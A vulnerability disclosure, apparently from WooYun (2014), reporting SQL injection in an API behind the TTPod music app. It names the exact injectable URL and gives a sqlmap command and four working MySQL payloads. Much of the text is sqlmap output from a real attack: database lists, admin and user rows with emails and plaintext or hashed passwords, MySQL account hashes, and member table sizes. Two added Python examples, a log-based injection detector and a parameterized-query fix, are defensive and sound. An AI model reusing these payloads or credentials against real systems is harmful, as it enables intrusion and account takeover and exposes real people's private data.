
The 天天动听 (TTPod) app client has a SQL injection vulnerability that can leak nearly 600,000 (60W) member records (the database could be dumped)

2014-08-08 03:35

Found in: the latest version of the 天天动听 (TTPod) Android client



Injection point: http://api.busdh.com/market-api/appgame/global?f=f384&v=v6.5.0.2013123016



The GET parameter f is injectable.

Just reporting the injection point; no further testing was done!



sqlmap.py -u 'http://api.busdh.com/market-api/appgame/global?f=f384&v=v6.5.0.2013123016' -p "f" --batch

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: f

Type: boolean-based blind

Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)

Payload: f=f384' RLIKE (SELECT (CASE WHEN (5571=5571) THEN 0x66333834 ELSE 0x28 END)) AND 'snjQ'='snjQ&v=v6.5.0.2013123016



Type: error-based

Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)

Payload: f=f384' AND UPDATEXML(3360,CONCAT(0x2e,0x716e6b6171,(SELECT (CASE WHEN (3360=3360) THEN 1 ELSE 0 END)),0x716e616d71),6423) AND 'tnpf'='tnpf&v=v6.5.0.2013123016



Type: UNION query

Title: MySQL UNION query (NULL) - 1 column

Payload: f=f384' UNION ALL SELECT CONCAT(0x716e6b6171,0x4e506c54656853686e61,0x716e616d71)#&v=v6.5.0.2013123016



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 OR time-based blind

Payload: f=-8917' OR 5490=SLEEP(5) AND 'FWhc'='FWhc&v=v6.5.0.2013123016

---

back-end DBMS: MySQL 5.1
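The sqlmap output above shows the four technique families that worked against the f parameter (boolean-based blind via RLIKE, error-based via UPDATEXML, a one-column UNION query, and time-based blind via SLEEP). A defender reviewing web server logs for this endpoint can look for exactly those fingerprints in decoded query-string values. The following is an added example written for this page, not code from the original report or from the vendor: it assumes a combined-style access log, URL-decodes each parameter with the standard library, and flags the parameter and technique. The sample log lines are constructed (the benign request reuses the page's URL; the four others carry simplified, URL-encoded payload shapes matching the sqlmap titles above).

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Fingerprints of the four sqlmap techniques reported for the f parameter.
# Each pattern is matched against the URL-decoded parameter value, case-insensitively.
TECHNIQUES = [
    ("boolean-based blind (RLIKE)", re.compile(r"\bRLIKE\b", re.I)),
    ("error-based (UPDATEXML)", re.compile(r"\bUPDATEXML\s*\(", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("time-based blind (SLEEP)", re.compile(r"\bSLEEP\s*\(", re.I)),
]

# Pulls the request line ("GET /path?query HTTP/1.1") out of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_value(value: str) -> list[str]:
    """Return the name of every technique whose fingerprint appears in the decoded value."""
    return [name for name, pattern in TECHNIQUES if pattern.search(value)]


def suspicious_params(target: str) -> list[tuple[str, str]]:
    """Decode the query string of a request target and report (parameter, technique) hits."""
    hits = []
    query = urlsplit(target).query
    # parse_qsl undoes percent-encoding, so %27 becomes a quote and %28 a parenthesis.
    for param, value in parse_qsl(query, keep_blank_values=True):
        for technique in classify_value(value):
            hits.append((param, technique))
    return hits


def scan_log(lines) -> list[dict]:
    """Return one finding per log line whose query string carries an injection fingerprint."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = suspicious_params(m.group("target"))
        if hits:
            findings.append({"line": line, "hits": hits})
    return findings


# Constructed sample log lines (not taken from the report): one normal request and
# four carrying URL-encoded payloads shaped like the sqlmap techniques listed above.
SAMPLE_LOG = [
    '10.0.2.15 - - [08/Aug/2014:03:30:00 +0800] "GET /market-api/appgame/global?f=f384&v=v6.5.0.2013123016 HTTP/1.1" 200 512',
    '10.0.2.15 - - [08/Aug/2014:03:31:00 +0800] "GET /market-api/appgame/global?f=f384%27%20RLIKE%20%28SELECT%201%29%20AND%20%27a%27%3D%27a&v=v6.5.0.2013123016 HTTP/1.1" 200 512',
    '10.0.2.15 - - [08/Aug/2014:03:32:00 +0800] "GET /market-api/appgame/global?f=f384%27%20AND%20UPDATEXML%281%2CCONCAT%280x2e%2C1%29%2C1%29%20AND%20%27b%27%3D%27b&v=v6.5.0.2013123016 HTTP/1.1" 500 231',
    '10.0.2.15 - - [08/Aug/2014:03:33:00 +0800] "GET /market-api/appgame/global?f=f384%27%20UNION%20ALL%20SELECT%20NULL%23&v=v6.5.0.2013123016 HTTP/1.1" 200 640',
    '10.0.2.15 - - [08/Aug/2014:03:34:00 +0800] "GET /market-api/appgame/global?f=-1%27%20OR%201%3DSLEEP%285%29%20AND%20%27c%27%3D%27c&v=v6.5.0.2013123016 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["hits"], finding["line"][:90])
```

Matching on decoded values matters: the payloads in a real log are percent-encoded, so a pattern run over the raw line would miss `%27%20RLIKE`. The error-based request in the sample also returns a 500, which is a second, independent signal worth alerting on for this endpoint.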



available databases [22]:

[*] db_12530

[*] db_atj

[*] db_ayyc

[*] db_browsernav

[*] db_ddfg

[*] db_draw_busdh_com

[*] db_ios_skin

[*] db_market

[*] db_new_ttpod

[*] db_skin

[*] db_ttpod_discuz

[*] db_ttpod_ucenter

[*] db_update

[*] draw_busdh_com

[*] earphone

[*] entnews

[*] information_schema

[*] mysql

[*] performance_schema

[*] skin

[*] ttpod

[*] yuledb



http://draw.busdh.com/

Database: db_draw_busdh_com

Table: userinfo

[15 entries]

+-------------+--------------------+----------+---------------------+--------------+

| id | email | userName | createTime | userPassword |

+-------------+--------------------+----------+---------------------+--------------+

| 00000000426 | jiege82000@163.com | admin | 2013-10-31 14:02:11 | admin |

| 00000000427 | hr@ttpod.com | ttpod | 2013-10-31 14:06:33 | ttpod*()98 |

| 00000000428 | hr@ttpod.com | view | 2013-10-31 15:11:39 | view |

+-------------+--------------------+----------+---------------------+--------------+





http://fm.admin.ttpod.com/

http://admin.lrc.ttpod.com/auth/login





Database: ttpod

Table: admin

[10 entries]

+----+-------+------+----------------------------------+---------------------+

| id | name | flag | password | create_time |

+----+-------+------+----------------------------------+---------------------+

| 1 | ttpod | 0 | 5bb50d44821fffd63299af3025234087 | 2012-01-18 00:00:00 |

| 20 | baidu | 0 | dbf2074a06e4d98e7a291a38270af7b9 | 2013-01-31 08:39:39 |

+----+-------+------+----------------------------------+---------------------+



Database: db_new_ttpod

Table: users

[30 entries]

+----+----------------+---------------+----------------------------------------------------------------------------------------------+

| id | email | username | password |

+----+----------------+---------------+----------------------------------------------------------------------------------------------+

| 1 | clong@test.com | clong | 1100 |

| 2 | user1@test.com | user1 | $shiro1$SHA-256$500000$Cz8CvbpUrpgkk+k8puy3iA==$VRXptpQeeCwzYDTq+ZEr8rrTFFUIIan/Xk5jwHXFRYg= |

| 3 | admin@test.com | admin | jianguo*()98 |

| 4 | user2@test.com | user2 | $shiro1$SHA-256$500000$l48hH1mNJTZC35z6YPyj0w==$FyrwtiltMAdv7bwghfmGzqReJFliYcocbgiZkSaavMU= |

| 5 | <blank> | tcode_manager | ttpodt1n50 |

| 6 | <blank> | tcode_user | ttpod123 |

+----+----------------+---------------+----------------------------------------------------------------------------------------------+







database management system users [10]:

[*] 'db_bbs'@'10.0.2.%'

[*] 'db_browsernav'@'%'

[*] 'db_skin'@'%'

[*] 'db_skin'@'10.0.2.%'

[*] 'draw_busdh_com'@'10.0.2.%'

[*] 'earphone'@'%'

[*] 'link'@'%'

[*] 'root'@'localhost'

[*] 'slave'@'%'

[*] 'webis'@'%'





database management system users password hashes:

[*] db_bbs [1]:

password hash: *730A86BC4C3F693A6862F939E48BEBB75D786189

[*] db_browsernav [1]:

password hash: *01D060A476642BA8335B832AC5B211F222F641B5

[*] earphone [1]:

password hash: *01D060A476642BA8335B832AC5B211F222F641B5

[*] link [1]:

password hash: *01D060A476642BA8335B832AC5B211F222F641B5

[*] root [1]:

password hash: *01D060A476642BA8335B832AC5B211F222F641B5

[*] webis [1]:

password hash: *01D060A476642BA8335B832AC5B211F222F641B5



Database: db_ttpod_ucenter

+---------------------+---------+

| Table | Entries |

+---------------------+---------+

| uc_members | 594367 |

| uc_memberfields | 594365 |

| uc_newpm | 421201 |

| uc_pms | 4622 |

| uc_friends | 4276 |

| uc_pm_members | 2400 |

| uc_pm_indexes | 2059 |

| uc_pm_lists | 1237 |

| uc_notelist | 516 |

| uc_pm_messages_2 | 223 |

| uc_pm_messages_3 | 221 |

| uc_pm_messages_8 | 221 |

| uc_pm_messages_7 | 216 |

| uc_pm_messages_9 | 208 |

| uc_pm_messages_5 | 200 |

| uc_pm_messages_1 | 199 |

| uc_pm_messages_0 | 198 |

| uc_pm_messages_6 | 188 |

| uc_pm_messages_4 | 185 |

| uc_settings | 28 |

| uc_vars | 3 |

| uc_admins | 1 |

| uc_applications | 1 |

| uc_failedlogins | 1 |

| uc_protectedmembers | 1 |

+---------------------+---------+



[00:46:28] [INFO] the SQL query used returns 404 entries

Database: db_ttpod_discuz

+---------------------------------------+---------+

| Table | Entries |

+---------------------------------------+---------+

| pre_forum_post | 847629 |

| cdb_posts | 727193 |

| pre_common_member_log | 501857 |

| cdb_members | 501856 |

| cdb_memberfields | 501844 |

| pre_common_member_count_archive | 467197 |

| pre_common_member_field_forum_archive | 467197 |

| pre_common_member_profile_archive | 467197 |

| pre_common_member_status_archive | 467197 |

| pre_common_member_field_home_archive | 467196 |

| pre_common_member_archive | 467189 |

| pre_common_onlinetime | 294138 |

| pre_home_notification | 208959 |

| cdb_onlinetime | 204705 |

| pre_common_credit_rule_log | 166058 |

| pre_forum_attachment | 165258 |

| pre_forum_thread | 153779 |

| cdb_attachments | 124347 |

| pre_common_member | 110564 |

| pre_common_member_status | 110563 |

| pre_common_member_count | 110562 |

| pre_common_member_field_forum | 110561 |

| pre_common_member_field_home | 110561 |

| pre_common_member_profile | 110561 |

| pre_forum_threadaddviews | 105521 |

| pre_common_credit_log | 98319 |

| cdb_threads | 90232 |

| pre_security_evilpost | 86098 |

| cdb_spacecaches | 85234 |

| pre_common_member_newprompt | 72957 |

| pre_plugin_user_defender_badpwd | 66821 |

| pre_forum_threadmod | 60158 |

| pre_forum_ratelog | 59086 |

| cdb_ratelog | 57426 |

| pre_forum_threadpartake | 51160 |

| cdb_attachpaymentlog | 45503 |

| pre_common_district | 45052 |

| pre_forum_statlog | 37616 |

| pre_forum_pollvoter | 32688 |

| cdb_memberspaces | 30319 |

| pre_forum_filter_post | 23690 |

| pre_common_connect_guest | 22800 |

| cdb_threadsmod | 21460 |

| pre_connect_memberbindlog | 21201 |

| pre_common_member_connect | 19835 |

| pre_common_admincp_cmenu | 18913 |

| cdb_admincustom | 18903 |

| pre_forum_attachment_2 | 17757 |

| pre_forum_attachment_3 | 17259 |

| pre_forum_attachment_6 | 16682 |

| pre_forum_attachment_1 | 16646 |

| pre_forum_attachment_9 | 16357 |

| pre_forum_attachment_0 | 16104 |

| pre_forum_attachment_4 | 15775 |

| pre_forum_attachment_7 | 15662 |

| pre_forum_attachment_5 | 15462 |

| pre_forum_attachment_8 | 15196 |

| pre_home_friend_request | 13045 |

| pre_forum_modwork | 10522 |

| pre_connect_feedlog | 10034 |

| pre_security_eviluser | 9110 |

| pre_home_favorite | 8838 |

| cdb_myposts | 8810 |

| pre_forum_attachment_exif | 8667 |

| pre_forum_sofa | 8462 |

| cdb_favorites | 8394 |

| pre_discuz_security_banip | 8126 |

| pre_forum_thread_censor | 8106 |

| cdb_pms | 7829 |

| pre_common_word | 7497 |

| pre_forum_postcache | 7136 |

| cdb_modworks | 5622 |

| pre_connect_postfeedlog | 5457 |

| cdb_mythreads | 4832 |

| pre_connect_tthreadlog | 4735 |

| pre_common_remote_port | 4272 |

| pre_common_member_crime | 4201 |

| pre_forum_threadimage | 2599 |

| pre_common_magiclog | 2588 |

| cdb_magiclog | 2369 |

| pre_forum_medallog | 2369 |

| cdb_medallog | 2120 |

| pre_common_credit_rule_log_field | 2004 |

| pre_common_member_grouppm | 1599 |

| pre_forum_attachment_unused | 1449 |

| pre_common_credit_log_field | 1438 |

| cdb_paymentlog | 1425 |

| pre_forum_polloption | 1273 |

| cdb_polloptions | 1136 |

| pre_common_tagitem | 1116 |

| pre_common_member_medal | 1095 |

| pre_forum_postcomment | 1091 |

| pre_forum_newthread | 927 |

| pre_forum_threaddisablepos | 884 |

| pre_home_pic | 826 |

| pre_common_failedip | 825 |

| pre_home_friend | 762 |

| pre_common_member_action_log | 747 |

| pre_common_stat | 698 |

| pre_plugin_banklog | 678 |

| cdb_rsscaches | 638 |

| pre_forum_threadclass | 552 |

| pre_forum_post_tableid | 513 |

| pre_common_smiley | 501 |

| cdb_smilies | 472 |

| pre_common_setting | 465 |

| cdb_buddys | 462 |

| cdb_regips | 452 |

| pre_home_friendlog | 389 |

| cdb_stylevars | 360 |

| pre_discuz_security_manager_action | 357 |

| pre_forum_warning | 338 |

| pre_common_session | 336 |

| pre_discuz_security_forum | 327 |

| pre_common_statuser | 306 |

| pre_common_tag | 301 |

| cdb_warnings | 281 |

| pre_common_block_item | 254 |

| pre_home_comment | 250 |

| cdb_settings | 238 |

| pre_common_syscache | 229 |

| pre_forum_threadhot | 216 |

| pre_forum_poll | 190 |

| pre_home_pokearchive | 188 |

| cdb_words | 187 |

| pre_common_regip | 176 |

| cdb_polls | 169 |

| pre_home_feed | 167 |

| pre_forum_post_location | 161 |

| pre_forum_threadcalendar | 158 |

| pre_plugin_bankoperation | 155 |

| cdb_banned | 141 |

| pre_home_poke | 137 |

| pre_common_stylevar | 135 |

| cdb_statvars | 130 |

| pre_common_member_magic | 125 |

| pre_forum_rsscache | 115 |

| pre_common_block_pic | 108 |

| pre_baidusubmit_sitemap | 106 |

| pre_plugin_user_defender_stat | 105 |

| pre_common_block_style | 103 |

| cdb_membermagics | 102 |

| pre_home_follow | 98 |

| pre_home_visitor | 94 |

| pre_forum_hotreply_member | 93 |

| cdb_moderators | 90 |

| pre_common_searchindex | 90 |

| pre_forum_hotreply_number | 90 |

| pre_forum_moderator | 83 |

| pre_common_admincp_perm | 77 |

| cdb_threadtypes | 73 |

| pre_common_report | 72 |

| pre_forum_forum | 69 |

| pre_forum_forumfield | 69 |

| cdb_medals | 67 |

| pre_forum_medal | 67 |

| pre_forum_spacecache | 67 |

| cdb_forumlinks | 65 |

| cdb_typeoptions | 65 |

| pre_forum_typeoption | 65 |

| pre_common_pluginvar | 61 |

| pre_common_nav | 59 |

| cdb_forumfields | 58 |

| cdb_forums | 58 |

| pre_common_devicetoken | 54 |

| cdb_rewardlog | 52 |

| cdb_reportlog | 51 |

| pre_common_member_profile_setting | 51 |

| cdb_stats | 50 |

| pre_pig_member | 50 |

| pre_common_block | 49 |

| pre_common_cache | 49 |

| cdb_caches | 42 |

| cdb_subscriptions | 41 |

| pre_forum_attachtype | 41 |

| pre_common_member_verify | 39 |

| pre_common_member_secwhite | 38 |

| pre_common_optimizer | 36 |

| pre_common_template_block | 35 |

| pre_common_usergroup_field | 35 |

| cdb_attachtypes | 34 |

| cdb_faqs | 34 |

| cdb_usergroups | 33 |

| pre_forum_thread_moderate | 33 |

| pre_home_album | 33 |

| pre_common_credit_rule | 32 |

| cdb_promotions | 31 |

| pre_common_usergroup | 31 |

| pre_home_blog | 27 |

| pre_home_blogfield | 27 |

| pre_common_magic | 25 |

| pre_common_friendlink | 22 |

| pre_common_plugin | 22 |

| cdb_threadtags | 21 |

| pre_common_cron | 20 |

| cdb_tags | 19 |

| pre_common_banned | 18 |

| pre_plugin_user_defender | 18 |

| cdb_failedlogins | 17 |

| cdb_searchindex | 15 |

| pre_forum_poststick | 15 |

| pre_home_click | 15 |

| cdb_crons | 13 |

| pre_common_grouppm | 13 |

| pre_common_myapp | 13 |

| cdb_magics | 12 |

| cdb_projects | 12 |

| pre_common_failedlogin | 12 |

| pre_forum_bbcode | 11 |

| pre_home_doing | 11 |

| pre_common_admincp_member | 10 |

| pre_security_member | 10 |

| cdb_bbcodes | 9 |

| cdb_ranks | 9 |

| cdb_styles | 9 |

| pre_baidusubmit_setting | 9 |

| pre_common_secquestion | 9 |

| pre_baidusubmit_urlstat | 8 |

| pre_forum_polloption_image | 8 |

| pre_forum_post_moderate | 8 |

| cdb_templates | 7 |

| cdb_magicmarket | 6 |

| cdb_request | 6 |

| pre_common_diy_data | 6 |

| pre_forum_onlinelist | 6 |

| pre_home_show | 6 |

| cdb_announcements | 5 |

| pre_common_admincp_group | 5 |

| pre_common_admingroup | 5 |

| pre_common_advertisement | 5 |

| pre_common_member_verify_info | 5 |

| cdb_admingroups | 4 |

| cdb_creditslog | 4 |

| cdb_imagetypes | 4 |

| cdb_onlinelist | 4 |

| cdb_typemodels | 4 |

| pre_common_process | 4 |

| pre_discuz_security_adminlog | 4 |

| pre_forum_access | 4 |

| pre_forum_imagetype | 4 |

| pre_forum_threadclosed | 4 |

| pre_plugin_user_defender_failedlogin | 4 |

| pre_common_word_type | 3 |

| pre_forum_grouplevel | 3 |

| pre_forum_replycredit | 3 |

| pre_home_class | 3 |

| cdb_access | 2 |

| cdb_advertisements | 2 |

| pre_common_admincp_session | 2 |

| pre_common_patch | 2 |

| pre_common_style | 2 |

| pre_common_template | 2 |

| pre_forum_promotion | 2 |

| pre_mobile_setting | 2 |

| pre_plugin_banklist | 2 |

| pre_tools_rule | 2 |

| pre_yy_killreg | 2 |

| cdb_adminactions | 1 |

| cdb_adminsessions | 1 |

| cdb_itempool | 1 |

| cdb_pmsearchindex | 1 |

| cdb_profilefields | 1 |

| pre_common_addon | 1 |

| pre_common_uin_black | 1 |

| pre_forum_announcement | 1 |

| pre_forum_threadprofile | 1 |

| pre_forum_trade | 1 |

| pre_hdx_player_activity | 1 |

| pre_home_picfield | 1 |

| pre_home_share | 1 |

+---------------------------------------+---------+




Proof of vulnerability:

[image: ttpod.png]

Fix:

Apply effective input filtering.
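The recommended fix is filtering; in practice that means two layers: validate the parameter against the shape it is supposed to have, and bind it as a query parameter so the database never parses it as SQL. The block below is an added example for this page, not the vendor's code, and the table, columns and rows are constructed stand-ins for whatever the real endpoint queries. It shows the defect class from the report (the value spliced into the SQL text, so a quote changes the query) beside the hardened lookup, using SQLite so it runs offline. The allowed code shape (a letter followed by digits, as in f384) is an assumption.

```python
import re
import sqlite3

# Constructed stand-in for the lookup behind the reported endpoint.
# Table name, column names and rows are assumptions, not the real schema.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE app_channels (code TEXT PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO app_channels VALUES (?, ?)",
        [("f384", "channel-384"), ("f385", "channel-385"), ("f999", "internal-test")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, f: str) -> list[str]:
    """The defect class in the report: the parameter is spliced into the SQL text,
    so a single quote in f changes the structure of the query."""
    sql = "SELECT name FROM app_channels WHERE code = '%s'" % f
    return [row[0] for row in conn.execute(sql)]


# Assumed shape of a valid channel code: one lowercase letter followed by 1-6 digits.
CODE_RE = re.compile(r"^[a-z][0-9]{1,6}$")


def lookup_safe(conn: sqlite3.Connection, f: str) -> list[str]:
    """Hardened form: reject values outside the expected shape, then bind the value
    as a parameter so the database driver never treats it as SQL."""
    if not CODE_RE.fullmatch(f):
        raise ValueError("invalid channel code")
    rows = conn.execute("SELECT name FROM app_channels WHERE code = ?", (f,))
    return [row[0] for row in rows]


def lookup_parameterized_only(conn: sqlite3.Connection, f: str) -> list[str]:
    """Binding without the allowlist, to show that a tautology in f is then just an
    ordinary string that matches no row. The allowlist is still worth keeping: it
    fails fast and gives a clean signal to log."""
    rows = conn.execute("SELECT name FROM app_channels WHERE code = ?", (f,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    conn = make_db()
    probe = "f384' OR '1'='1"          # classic boolean tautology, the same class sqlmap used
    print("vulnerable:", lookup_vulnerable(conn, probe))      # every row leaks
    print("bound only:", lookup_parameterized_only(conn, probe))  # no row matches
    try:
        lookup_safe(conn, probe)
    except ValueError as exc:
        print("validated:", exc)                              # rejected before the query
    print("normal:", lookup_safe(conn, "f384"))
```

The second layer is what actually closes the hole; "filtering" alone, implemented as a blocklist of keywords, tends to miss encodings and alternative syntax, whereas a bound parameter is never interpreted as SQL regardless of its content.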

Some private information and related passwords are posted above; it is recommended to change them!

Source: www.wooyun.org/bugs/wooyun-2014-065996

Tags: injection, vulnerability
